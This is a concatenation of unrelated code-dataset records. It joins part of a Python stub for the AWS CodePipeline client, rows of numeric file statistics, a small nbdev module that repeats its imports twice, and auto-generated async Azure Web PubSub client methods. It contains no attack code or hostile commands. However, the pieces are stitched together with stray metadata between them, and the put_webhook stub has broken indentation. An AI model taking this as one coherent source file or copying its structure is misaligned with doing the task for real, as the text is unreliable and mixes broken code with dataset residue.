    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutJobSuccessResult>`_
    **Request Syntax**
    ::
    response = client.put_job_success_result(
    jobId='string',
    currentRevision={
    'revision': 'string',
    'changeIdentifier': 'string',
    'created': datetime(2015, 1, 1),
    'revisionSummary': 'string'
    },
    continuationToken='string',
    executionDetails={
    'summary': 'string',
    'externalExecutionId': 'string',
    'percentComplete': 123
    }
    )
    :type jobId: string
    :param jobId: **[REQUIRED]**
    The unique system-generated ID of the job that succeeded. This is the same ID returned from PollForJobs.
    :type currentRevision: dict
    :param currentRevision:
    The ID of the current revision of the artifact successfully worked upon by the job.
    - **revision** *(string) --* **[REQUIRED]**
    The revision ID of the current version of an artifact.
    - **changeIdentifier** *(string) --* **[REQUIRED]**
    The change identifier for the current revision.
    - **created** *(datetime) --*
    The date and time when the most recent revision of the artifact was created, in timestamp format.
    - **revisionSummary** *(string) --*
    The summary of the most recent revision of the artifact.
    :type continuationToken: string
    :param continuationToken:
    A token generated by a job worker, such as an AWS CodeDeploy deployment ID, that a successful job provides to identify a custom action in progress. Future jobs will use this token in order to identify the running instance of the action. It can be reused to return additional information about the progress of the custom action. When the action is complete, no continuation token should be supplied.
    :type executionDetails: dict
    :param executionDetails:
    The execution details of the successful job, such as the actions taken by the job worker.
    - **summary** *(string) --*
    The summary of the current status of the actions.
    - **externalExecutionId** *(string) --*
    The system-generated unique ID of this action used to identify this job worker in any external systems, such as AWS CodeDeploy.
    - **percentComplete** *(integer) --*
    The percentage of work completed on the action, represented on a scale of zero to one hundred percent.
    :returns: None
    """
    pass
def put_third_party_job_failure_result(self, jobId: str, clientToken: str, failureDetails: Dict):
    """
    Represents the failure of a third party job as returned to the pipeline by a job worker. Only used for partner actions.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutThirdPartyJobFailureResult>`_
    **Request Syntax**
    ::
    response = client.put_third_party_job_failure_result(
    jobId='string',
    clientToken='string',
    failureDetails={
    'type': 'JobFailed'|'ConfigurationError'|'PermissionError'|'RevisionOutOfSync'|'RevisionUnavailable'|'SystemUnavailable',
    'message': 'string',
    'externalExecutionId': 'string'
    }
    )
    :type jobId: string
    :param jobId: **[REQUIRED]**
    The ID of the job that failed. This is the same ID returned from PollForThirdPartyJobs.
    :type clientToken: string
    :param clientToken: **[REQUIRED]**
    The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
    :type failureDetails: dict
    :param failureDetails: **[REQUIRED]**
    Represents information about failure details.
    - **type** *(string) --* **[REQUIRED]**
    The type of the failure. Valid values are enumerated in the **Request Syntax** above.
    - **message** *(string) --* **[REQUIRED]**
    The message about the failure.
    - **externalExecutionId** *(string) --*
    The external ID of the run of the action that failed.
    :returns: None
    """
    pass
def put_third_party_job_success_result(self, jobId: str, clientToken: str, currentRevision: Dict = None, continuationToken: str = None, executionDetails: Dict = None):
    """
    Represents the success of a third party job as returned to the pipeline by a job worker. Only used for partner actions. A job worker reports a completed job, or an in-progress one by supplying a ``continuationToken``.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutThirdPartyJobSuccessResult>`_
    **Request Syntax**
    ::
    response = client.put_third_party_job_success_result(
    jobId='string',
    clientToken='string',
    currentRevision={
    'revision': 'string',
    'changeIdentifier': 'string',
    'created': datetime(2015, 1, 1),
    'revisionSummary': 'string'
    },
    continuationToken='string',
    executionDetails={
    'summary': 'string',
    'externalExecutionId': 'string',
    'percentComplete': 123
    }
    )
    :type jobId: string
    :param jobId: **[REQUIRED]**
    The ID of the job that successfully completed. This is the same ID returned from PollForThirdPartyJobs.
    :type clientToken: string
    :param clientToken: **[REQUIRED]**
    The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
    :type currentRevision: dict
    :param currentRevision:
    Represents information about a current revision.
    - **revision** *(string) --* **[REQUIRED]**
    The revision ID of the current version of an artifact.
    - **changeIdentifier** *(string) --* **[REQUIRED]**
    The change identifier for the current revision.
    - **created** *(datetime) --*
    The date and time when the most recent revision of the artifact was created, in timestamp format.
    - **revisionSummary** *(string) --*
    The summary of the most recent revision of the artifact.
    :type continuationToken: string
    :param continuationToken:
    A token generated by a job worker, such as an AWS CodeDeploy deployment ID, that a successful job provides to identify a partner action in progress. Future jobs will use this token in order to identify the running instance of the action. It can be reused to return additional information about the progress of the partner action. When the action is complete, no continuation token should be supplied.
    :type executionDetails: dict
    :param executionDetails:
    The details of the actions taken and results produced on an artifact as it passes through stages in the pipeline.
    - **summary** *(string) --*
    The summary of the current status of the actions.
    - **externalExecutionId** *(string) --*
    The system-generated unique ID of this action used to identify this job worker in any external systems, such as AWS CodeDeploy.
    - **percentComplete** *(integer) --*
    The percentage of work completed on the action, represented on a scale of zero to one hundred percent.
    :returns: None
    """
    pass
def put_webhook(self, webhook: Dict) -> Dict:
"""
Defines a webhook and returns a unique webhook URL generated by CodePipeline. This URL can be supplied to third party source hosting providers to call every time there's a code change. When CodePipeline receives a POST request on this URL, the pipeline defined in the webhook is started as long as the POST request satisfied the authentication and filtering requirements supplied when defining the webhook. RegisterWebhookWithThirdParty and DeregisterWebhookWithThirdParty APIs can be used to automatically configure supported third parties to call the generated webhook URL.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutWebhook>`_
**Request Syntax**
::
response = client.put_webhook(
webhook={
'name': 'string',
'targetPipeline': 'string',
'targetAction': 'string',
'filters': [
{
'jsonPath': 'string',
'matchEquals': 'string'
},
],
'authentication': 'GITHUB_HMAC'|'IP'|'UNAUTHENTICATED',
'authenticationConfiguration': {
'AllowedIPRange': 'string',
'SecretToken': 'string'
}
}
)
**Response Syntax**
::
{
'webhook': {
'definition': {
'name': 'string',
'targetPipeline': 'string',
'targetAction': 'string',
'filters': [
{
'jsonPath': 'string',
'matchEquals': 'string'
},
],
'authentication': 'GITHUB_HMAC'|'IP'|'UNAUTHENTICATED',
'authenticationConfiguration': {
'AllowedIPRange': 'string',
'SecretToken': 'string'
}
},
'url': 'string',
'errorMessage': 'string',
'errorCode': 'string',
'lastTriggered': datetime(2015, 1, 1),
'arn': 'string'
}
}
**Response Structure**
- *(dict) --*
- **webhook** *(dict) --*
The detail returned from creating the webhook, such as the webhook name, webhook URL, and webhook ARN.
- **definition** *(dict) --*
The detail returned for each webhook, such as the webhook authentication type and filter rules.
- **name** *(string) --*
The name of the webhook.
- **targetPipeline** *(string) --*
The name of the pipeline you want to connect to the webhook.
- **targetAction** *(string) --*
The name of the action in a pipeline you want to connect to the webhook. The action must be from the source (first) stage of the pipeline.
- **filters** *(list) --*
A list of rules applied to the body/payload sent in the POST request to a webhook URL. All defined rules must pass for the request to be accepted and the pipeline started.
- *(dict) --*
The event criteria that specify when a webhook notification is sent to your URL.
- **jsonPath** *(string) --*
A JsonPath expression that will be applied to the body/payload of the webhook. The value selected by JsonPath expression must match the value specified in the matchEquals field, otherwise the request will be ignored. More information on JsonPath expressions can be found here: https://github.com/json-path/JsonPath.
- **matchEquals** *(string) --*
The value selected by the JsonPath expression must match what is supplied in the MatchEquals field, otherwise the request will be ignored. Properties from the target action configuration can be included as placeholders in this value by surrounding the action configuration key with curly braces. For example, if the value supplied here is "refs/heads/{Branch}" and the target action has an action configuration property called "Branch" with a value of "master", the MatchEquals value will be evaluated as "refs/heads/master". A list of action configuration properties for built-in action types can be found here: `Pipeline Structure Reference Action Requirements <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#action-requirements>`__ .
- **authentication** *(string) --*
Supported options are GITHUB_HMAC, IP and UNAUTHENTICATED.
* GITHUB_HMAC implements the authentication scheme described here: https://developer.github.com/webhooks/securing/
* IP will reject webhooks trigger requests unless they originate from an IP within the IP range whitelisted in the authentication configuration.
* UNAUTHENTICATED will accept all webhook trigger requests regardless of origin.
- **authenticationConfiguration** *(dict) --*
Properties that configure the authentication applied to incoming webhook trigger requests. The required properties depend on the authentication type. For GITHUB_HMAC, only the SecretToken property must be set. For IP, only the AllowedIPRange property must be set to a valid CIDR range. For UNAUTHENTICATED, no properties can be set.
- **AllowedIPRange** *(string) --*
The property used to configure acceptance of webhooks within a specific IP range. For IP, only the AllowedIPRange property must be set, and this property must be set to a valid CIDR range.
- **SecretToken** *(string) --*
The property used to configure GitHub authentication. For GITHUB_HMAC, only the SecretToken property must be set.
- **url** *(string) --*
A unique URL generated by CodePipeline. When a POST request is made to this URL, the defined pipeline is started as long as the body of the post request satisfies the defined authentication and filtering conditions. Deleting and re-creating a webhook will make the old URL invalid and generate a new URL.
- **errorMessage** *(string) --*
The text of the error message about the webhook.
- **errorCode** *(string) --*
The number code of the error.
- **lastTriggered** *(datetime) --*
The date and time a webhook was last successfully triggered, in timestamp format.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the webhook.
:type webhook: dict
:param webhook: **[REQUIRED]**
The detail provided in an input file to create the webhook, such as the webhook name, the pipeline name, and the action name. Give the webhook a unique name which identifies the webhook being defined. You may choose to name the webhook after the pipeline and action it targets so that you can easily recognize what it\'s used for later.
- **name** *(string) --* **[REQUIRED]**
The name of the webhook.
- **targetPipeline** *(string) --* **[REQUIRED]**
The name of the pipeline you want to connect to the webhook.
- **targetAction** *(string) --* **[REQUIRED]**
The name of the action in a pipeline you want to connect to the webhook. The action must be from the source (first) stage of the pipeline.
- **filters** *(list) --* **[REQUIRED]**
A list of rules applied to the body/payload sent in the POST request to a webhook URL. All defined rules must pass for the request to be accepted and the pipeline started.
- *(dict) --*
The event criteria that specify when a webhook notification is sent to your URL.
- **jsonPath** *(string) --* **[REQUIRED]**
A JsonPath expression that will be applied to the body/payload of the webhook. The value selected by JsonPath expression must match the value specified in the matchEquals field, otherwise the request will be ignored. More information on JsonPath expressions can be found here: https://github.com/json-path/JsonPath.
- **matchEquals** *(string) --*
The value selected by the JsonPath expression must match what is supplied in the MatchEquals field, otherwise the request will be ignored. Properties from the target action configuration can be included as placeholders in this value by surrounding the action configuration key with curly braces. For example, if the value supplied here is \"refs/heads/{Branch}\" and the target action has an action configuration property called \"Branch\" with a value of \"master\", the MatchEquals value will be evaluated as \"refs/heads/master\". A list of action configuration properties for built-in action types can be found here: `Pipeline Structure Reference Action Requirements <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#action-requirements>`__ .
- **authentication** *(string) --* **[REQUIRED]**
Supported options are GITHUB_HMAC, IP and UNAUTHENTICATED.
* GITHUB_HMAC implements the authentication scheme described here: https://developer.github.com/webhooks/securing/
* IP will reject webhooks trigger requests unless they originate from an IP within the IP range whitelisted in the authentication configuration.
* UNAUTHENTICATED will accept all webhook trigger requests regardless of origin.
- **authenticationConfiguration** *(dict) --* **[REQUIRED]**
Properties that configure the authentication applied to incoming webhook trigger requests. The required properties depend on the authentication type. For GITHUB_HMAC, only the SecretToken property must be set. For IP, only the AllowedIPRange property must be set to a valid CIDR range. For UNAUTHENTICATED, no properties can be set.
- **AllowedIPRange** *(string) --*
The property used to configure acceptance of webhooks within a specific IP range. For IP, only the AllowedIPRange property must be set, and this property must be set to a valid CIDR range.
- **SecretToken** *(string) --*
The property used to configure GitHub authentication. For GITHUB_HMAC, only the SecretToken property must be set.
:rtype: dict
:returns:
"""
pass
def register_webhook_with_third_party(self, webhookName: str = None) -> Dict:
    """Register an existing webhook with a supported third-party tool.

    Configures a connection between a webhook that was created with
    PutWebhook and the external tool, with events to be detected.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/RegisterWebhookWithThirdParty>`_

    :type webhookName: string
    :param webhookName: The name of an existing webhook created with
        PutWebhook to register with a supported third party.
    :rtype: dict
    :returns: An empty dict on success.
    """
    pass
def retry_stage_execution(self, pipelineName: str, stageName: str, pipelineExecutionId: str, retryMode: str) -> Dict:
    """Resume a pipeline execution by retrying the last failed actions in a stage.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/RetryStageExecution>`_

    :type pipelineName: string
    :param pipelineName: **[REQUIRED]** The name of the pipeline that
        contains the failed stage.
    :type stageName: string
    :param stageName: **[REQUIRED]** The name of the failed stage to be
        retried.
    :type pipelineExecutionId: string
    :param pipelineExecutionId: **[REQUIRED]** The ID of the pipeline
        execution in the failed stage to be retried. Use the
        GetPipelineState action to retrieve the current
        pipelineExecutionId of the failed stage.
    :type retryMode: string
    :param retryMode: **[REQUIRED]** The scope of the retry attempt.
        Currently, the only supported value is ``FAILED_ACTIONS``.
    :rtype: dict
    :returns: A dict with a ``pipelineExecutionId`` key (string): the ID
        of the current workflow execution in the failed stage.
    """
    pass
def start_pipeline_execution(self, name: str, clientRequestToken: str = None) -> Dict:
    """Start the specified pipeline.

    Specifically, begins processing the latest commit to the source
    location specified as part of the pipeline.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/StartPipelineExecution>`_

    :type name: string
    :param name: **[REQUIRED]** The name of the pipeline to start.
    :type clientRequestToken: string
    :param clientRequestToken: The system-generated unique ID used to
        identify a unique execution request. This field is autopopulated
        if not provided.
    :rtype: dict
    :returns: A dict with a ``pipelineExecutionId`` key (string): the
        unique system-generated ID of the pipeline execution that was
        started.
    """
    pass
def update_pipeline(self, pipeline: Dict) -> Dict:
    """Update a specified pipeline with edits or changes to its structure.

    Use a JSON file with the pipeline structure in conjunction with
    UpdatePipeline to provide the full structure of the pipeline. Updating
    the pipeline increases the version number of the pipeline by 1.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/UpdatePipeline>`_

    :type pipeline: dict
    :param pipeline: **[REQUIRED]** The structure of the pipeline to update:

        - ``name`` *(string, required)*: the name of the pipeline.
        - ``roleArn`` *(string, required)*: the ARN for AWS CodePipeline to
          use to either perform actions with no actionRoleArn, or to assume
          roles for actions with an actionRoleArn.
        - ``artifactStore`` *(dict)*: the Amazon S3 bucket where artifacts
          are stored — ``type`` (e.g. ``'S3'``), ``location`` (bucket name,
          not a folder), and an optional ``encryptionKey`` (``id`` and
          ``type``; ``type`` must be ``'KMS'``). If ``encryptionKey`` is
          undefined, the default key for Amazon S3 is used.
        - ``artifactStores`` *(dict)*: a mapping of region name to
          artifactStore objects. There must be an artifact store for the
          pipeline region and for each cross-region action. Use either
          ``artifactStore`` or ``artifactStores``, not both.
        - ``stages`` *(list, required)*: stage declarations. Each stage has
          a required ``name``, a reserved ``blockers`` list, and a required
          ``actions`` list whose entries carry ``name``, ``actionTypeId``
          (``category``, ``owner``, ``provider``, ``version`` — all
          required), ``runOrder``, ``configuration``, ``outputArtifacts``,
          ``inputArtifacts``, ``roleArn``, and ``region``. An action's
          input artifact must exactly match an output artifact declared in
          a preceding action; output artifact names must be unique within
          a pipeline.
        - ``version`` *(integer)*: the pipeline version number. A new
          pipeline always has version 1; the number is automatically
          incremented when a pipeline is updated.

    :rtype: dict
    :returns: A dict with a ``pipeline`` key containing the structure of
        the updated pipeline (the same shape as the ``pipeline``
        parameter).
    """
    pass
| 60.88176
| 805
| 0.522984
| 19,611
| 199,266
| 5.300699
| 0.043904
| 0.016835
| 0.008918
| 0.010389
| 0.84489
| 0.818984
| 0.803554
| 0.786603
| 0.775935
| 0.762785
| 0
| 0.005466
| 0.392245
| 199,266
| 3,272
| 806
| 60.900367
| 0.852896
| 0.851073
| 0
| 0.45122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.45122
| false
| 0.45122
| 0.085366
| 0
| 0.54878
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
ed2d63f5f8bc9f8acf6d662ebf75645c3e0ae2f8
| 282
|
py
|
Python
|
nbdev/None.py
|
GenerallyIntelligent/nbdev
|
a7c664ed858b35a0704ec2ba6c08e8dda0b4b76c
|
[
"Apache-2.0"
] | null | null | null |
nbdev/None.py
|
GenerallyIntelligent/nbdev
|
a7c664ed858b35a0704ec2ba6c08e8dda0b4b76c
|
[
"Apache-2.0"
] | null | null | null |
nbdev/None.py
|
GenerallyIntelligent/nbdev
|
a7c664ed858b35a0704ec2ba6c08e8dda0b4b76c
|
[
"Apache-2.0"
] | null | null | null |
# Cell
from .imports import *
from fastcore.script import *
from fastcore.foundation import *
from keyword import iskeyword
import nbformat
# Cell
from .imports import *
from fastcore.script import *
from fastcore.foundation import *
from keyword import iskeyword
import nbformat
| 18.8
| 33
| 0.801418
| 36
| 282
| 6.277778
| 0.277778
| 0.265487
| 0.318584
| 0.185841
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.148936
| 282
| 15
| 34
| 18.8
| 0.941667
| 0.031915
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 13
|
ed68ff06fc822a7dda1a1ff554e769ed5043b424
| 47,460
|
py
|
Python
|
sdk/webpubsub/azure-messaging-webpubsubservice/azure/messaging/webpubsubservice/aio/operations/_operations.py
|
praveenkuttappan/azure-sdk-for-python
|
4b79413667b7539750a6c7dde15737013a3d4bd5
|
[
"MIT"
] | null | null | null |
sdk/webpubsub/azure-messaging-webpubsubservice/azure/messaging/webpubsubservice/aio/operations/_operations.py
|
praveenkuttappan/azure-sdk-for-python
|
4b79413667b7539750a6c7dde15737013a3d4bd5
|
[
"MIT"
] | 1
|
2021-06-07T06:37:28.000Z
|
2021-06-07T06:37:28.000Z
|
sdk/webpubsub/azure-messaging-webpubsubservice/azure/messaging/webpubsubservice/aio/operations/_operations.py
|
praveenkuttappan/azure-sdk-for-python
|
4b79413667b7539750a6c7dde15737013a3d4bd5
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, IO, List, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from ...operations._operations import build_add_connection_to_group_request, build_add_user_to_group_request, build_check_permission_request, build_close_all_connections_request, build_close_connection_request, build_close_group_connections_request, build_close_user_connections_request, build_connection_exists_request, build_generate_client_token_request, build_grant_permission_request, build_group_exists_request, build_remove_connection_from_group_request, build_remove_user_from_all_groups_request, build_remove_user_from_group_request, build_revoke_permission_request, build_send_to_all_request, build_send_to_connection_request, build_send_to_group_request, build_send_to_user_request, build_user_exists_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class WebPubSubServiceClientOperationsMixin:
@distributed_trace_async
async def generate_client_token(
    self,
    hub: str,
    *,
    user_id: Optional[str] = None,
    role: Optional[List[str]] = None,
    minutes_to_expire: Optional[int] = 60,
    **kwargs: Any
) -> Any:
    """Generate a token for a client to connect to the Azure Web PubSub service.

    :param hub: Target hub name, which should start with alphabetic
        characters and only contain alpha-numeric characters or underscore.
    :type hub: str
    :keyword user_id: User Id.
    :paramtype user_id: str
    :keyword role: Roles that the connection with the generated token will have.
    :paramtype role: list[str]
    :keyword minutes_to_expire: The expire time of the generated token.
    :paramtype minutes_to_expire: int
    :return: JSON object; e.g. ``{"token": "str"}`` where ``token`` is the
        value for the WebSocket client to connect to the service.
    :rtype: Any
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_cls = kwargs.pop('cls', None)  # type: ClsType[Any]
    # Map auth/not-found/conflict statuses to specific exception types;
    # callers may extend the mapping via the 'error_map' kwarg.
    err_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
    }
    err_map.update(kwargs.pop('error_map', {}))

    request = build_generate_client_token_request(
        hub=hub,
        user_id=user_id,
        role=role,
        minutes_to_expire=minutes_to_expire,
        template_url=self.generate_client_token.metadata['url'],
    )
    # Substitute the service endpoint into the request URL template.
    endpoint = self._serialize.url(
        "self._config.endpoint", self._config.endpoint, 'str', skip_quote=True
    )
    request.url = self._client.format_url(request.url, Endpoint=endpoint)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    if response.status_code != 200:
        map_error(status_code=response.status_code, response=response, error_map=err_map)
        raise HttpResponseError(response=response)

    # Empty body -> None; otherwise decode the JSON payload.
    deserialized = response.json() if response.content else None
    if custom_cls:
        return custom_cls(pipeline_response, deserialized, {})
    return deserialized

generate_client_token.metadata = {'url': '/api/hubs/{hub}/:generateToken'}  # type: ignore
@distributed_trace_async
async def close_all_connections(
    self,
    hub: str,
    *,
    excluded: Optional[List[str]] = None,
    reason: Optional[str] = None,
    **kwargs: Any
) -> None:
    """Close the connections in the hub.

    :param hub: Target hub name, which should start with alphabetic
        characters and only contain alpha-numeric characters or underscore.
    :type hub: str
    :keyword excluded: Exclude these connectionIds when closing the
        connections in the hub.
    :paramtype excluded: list[str]
    :keyword reason: The reason closing the client connection.
    :paramtype reason: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Map auth/not-found/conflict statuses to specific exception types;
    # callers may extend the mapping via the 'error_map' kwarg.
    err_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
    }
    err_map.update(kwargs.pop('error_map', {}))

    request = build_close_all_connections_request(
        hub=hub,
        excluded=excluded,
        reason=reason,
        template_url=self.close_all_connections.metadata['url'],
    )
    # Substitute the service endpoint into the request URL template.
    endpoint = self._serialize.url(
        "self._config.endpoint", self._config.endpoint, 'str', skip_quote=True
    )
    request.url = self._client.format_url(request.url, Endpoint=endpoint)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    # Service responds 204 No Content on success.
    if response.status_code != 204:
        map_error(status_code=response.status_code, response=response, error_map=err_map)
        raise HttpResponseError(response=response)

    if custom_cls:
        return custom_cls(pipeline_response, None, {})

close_all_connections.metadata = {'url': '/api/hubs/{hub}/:closeConnections'}  # type: ignore
@distributed_trace_async
async def send_to_all(
    self,
    hub: str,
    message: Union[IO, str],
    *,
    excluded: Optional[List[str]] = None,
    **kwargs: Any
) -> None:
    """Broadcast content inside request body to all the connected client connections.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param message: The payload body.
    :type message: IO or str
    :keyword excluded: Excluded connection Ids.
    :paramtype excluded: list[str]
    :keyword str content_type: Media type of the body sent to the API. Default value is
     "text/plain". Allowed values are: "application/json", "application/octet-stream",
     "text/plain".
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop('content_type', "text/plain")  # type: Optional[str]
    json = None
    content = None
    # Compare only the media type; ignore parameters such as '; charset=utf-8'.
    media_type = content_type.split(";")[0]
    if media_type in ('application/json', 'application/octet-stream'):
        content = message
    elif media_type == 'text/plain':
        json = message
    else:
        raise ValueError(
            "The content_type '{}' is not one of the allowed values: "
            "['application/json', 'application/octet-stream', 'text/plain']".format(content_type)
        )
    request = build_send_to_all_request(
        hub=hub,
        content_type=content_type,
        excluded=excluded,
        json=json,
        content=content,
        template_url=self.send_to_all.metadata['url'],
    )
    path_format_arguments = {
        "Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    }
    request.url = self._client.format_url(request.url, **path_format_arguments)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    # 202 Accepted is the only success status for a broadcast.
    if response.status_code not in [202]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)
    if cls:
        return cls(pipeline_response, None, {})
send_to_all.metadata = {'url': '/api/hubs/{hub}/:send'}  # type: ignore
@distributed_trace_async
async def connection_exists(
    self,
    hub: str,
    connection_id: str,
    **kwargs: Any
) -> None:
    """Check if the connection with the given connectionId exists.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param connection_id: The connection Id.
    :type connection_id: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_connection_exists_request(
        hub=hub,
        connection_id=connection_id,
        template_url=self.connection_exists.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # 200 means the connection exists, 404 that it does not; both are valid outcomes.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code not in (200, 404):
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
connection_exists.metadata = {'url': '/api/hubs/{hub}/connections/{connectionId}'}  # type: ignore
@distributed_trace_async
async def close_connection(
    self,
    hub: str,
    connection_id: str,
    *,
    reason: Optional[str] = None,
    **kwargs: Any
) -> None:
    """Close the client connection.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param connection_id: Target connection Id.
    :type connection_id: str
    :keyword reason: The reason closing the client connection.
    :paramtype reason: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_close_connection_request(
        hub=hub,
        connection_id=connection_id,
        reason=reason,
        template_url=self.close_connection.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # Only 204 No Content is a successful close.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code != 204:
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
close_connection.metadata = {'url': '/api/hubs/{hub}/connections/{connectionId}'}  # type: ignore
@distributed_trace_async
async def send_to_connection(
    self,
    hub: str,
    connection_id: str,
    message: Union[IO, str],
    **kwargs: Any
) -> None:
    """Send content inside request body to the specific connection.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param connection_id: The connection Id.
    :type connection_id: str
    :param message: The payload body.
    :type message: IO or str
    :keyword str content_type: Media type of the body sent to the API. Default value is
     "text/plain". Allowed values are: "application/json", "application/octet-stream",
     "text/plain".
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop('content_type', "text/plain")  # type: Optional[str]
    json = None
    content = None
    # Compare only the media type; ignore parameters such as '; charset=utf-8'.
    media_type = content_type.split(";")[0]
    if media_type in ('application/json', 'application/octet-stream'):
        content = message
    elif media_type == 'text/plain':
        json = message
    else:
        raise ValueError(
            "The content_type '{}' is not one of the allowed values: "
            "['application/json', 'application/octet-stream', 'text/plain']".format(content_type)
        )
    request = build_send_to_connection_request(
        hub=hub,
        connection_id=connection_id,
        content_type=content_type,
        json=json,
        content=content,
        template_url=self.send_to_connection.metadata['url'],
    )
    path_format_arguments = {
        "Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    }
    request.url = self._client.format_url(request.url, **path_format_arguments)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    # 202 Accepted is the only success status for a send.
    if response.status_code not in [202]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)
    if cls:
        return cls(pipeline_response, None, {})
